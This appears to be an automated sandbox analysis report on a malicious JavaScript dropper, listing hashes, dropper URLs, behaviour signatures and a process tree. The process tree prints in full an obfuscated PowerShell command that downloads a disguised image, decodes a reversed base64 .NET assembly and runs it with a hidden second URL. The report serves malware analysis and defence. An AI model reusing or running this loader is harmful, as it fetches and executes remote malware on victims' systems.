Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    20-01-2025 06:29

General

  • Target

    20250120.js

  • Size

    155KB

  • MD5

    fe92c7ee393a2c87ccb3034c9ce18b14

  • SHA1

    8d2c9d5a5c985fb4feb466be1a4752d67042f4b7

  • SHA256

    85f2eb1ab28147d1353a0dbcc5592dcd955e6560e7a33015a303717c4b588d72

  • SHA512

    1adc6de119ce2090ce0752ece5d23e84dfa77e7ebe4505f7b4c5ef206808962b623d527cc888f2028e585f83d7261c7aec4241b90912c2e070eea38791c99ad4

  • SSDEEP

    768:loXxTexWHGJUY61tqTo7RkIwZnBN09oavEug4zdv9PCX9p6FHs5+hAQCx8PkYWXb:QTr8tIInBNKduYM5lOPTWf67ZqGxiZA0

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20

exe.dropper

https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\20250120.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2124
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.ennada/az.oc.secnailppanednil//:sp##h';$restoredText = $originalText -replace '#', 't';$vilifiers = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$hemichannels = New-Object System.Net.WebClient;$osteogenesy = $hemichannels.DownloadData($vilifiers);$rescindable = [System.Text.Encoding]::UTF8.GetString($osteogenesy);$phytotoxic = '<<BASE64_START>>';$Homberg = '<<BASE64_END>>';$committed = $rescindable.IndexOf($phytotoxic);$rhamphodon = $rescindable.IndexOf($Homberg);$committed -ge 0 -and $rhamphodon -gt $committed;$committed += $phytotoxic.Length;$dyotheletian = $rhamphodon - $committed;$gradualistic = $rescindable.Substring($committed, $dyotheletian);$quadropole = -join ($gradualistic.ToCharArray() | ForEach-Object { $_ })[-1..-($gradualistic.Length)];$phosphorical = [System.Convert]::FromBase64String($quadropole);$aegophony = [System.Reflection.Assembly]::Load($phosphorical);$stolonization = [dnlib.IO.Home].GetMethod('VAI');$stolonization.Invoke($null, @($restoredText, 'palatines', 'palatines', 'palatines', 'MSBuild', 'palatines', 'palatines','palatines','palatines','palatines','palatines','palatines','1','palatines','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2492

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2492-4-0x0000000002850000-0x00000000028D0000-memory.dmp

    Filesize

    512KB

  • memory/2492-5-0x000000001B5B0000-0x000000001B892000-memory.dmp

    Filesize

    2.9MB

  • memory/2492-6-0x0000000002340000-0x0000000002348000-memory.dmp

    Filesize

    32KB

  • memory/2492-7-0x0000000002850000-0x00000000028D0000-memory.dmp

    Filesize

    512KB